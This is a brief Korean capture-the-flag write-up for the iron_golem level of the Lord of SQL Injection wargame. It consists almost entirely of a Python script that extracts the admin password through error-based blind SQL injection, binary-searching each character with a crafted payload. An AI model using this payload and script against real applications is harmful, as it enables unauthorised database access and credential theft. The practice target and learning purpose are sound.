LOS :: 21번 IRON

Wargame/LOS(rubiya)

LOS :: 21번 IRON_GOLEM

G0pher 2018. 8. 23. 10:30

WRITE UP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
 
url = "http://los.rubiya.kr/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
session = {'PHPSESSID':'MY_SESSION'}
data = {}
 
flag=""
 
print("[∞] flag : ",end='')
 
for i in range(1,18):
    a=0
    b=100000
    while b-a!=0:
        center = a+(b-a)//2+1
        data['pw'] = "' or id='admin' and if(ord(mid(pw,"+str(i)+",1))<"
                     +str(center)+",(select 1 union select 2),1)#"
        res = requests.get(url, params=data, cookies=session)
        if "Subquery" in res.text:
            b=center-1
        else:
            a=center
            
    print(chr(a),end='')
    flag = flag + chr(a)
 
data['pw']=flag
res = requests.get(url, params=data, cookies = session)
 
if "Clear!" in res.text:
   print("\n[♪] IRON_GOLEM Clear!")
Colored by Color Scripter
cs

저작자표시 비영리 동일조건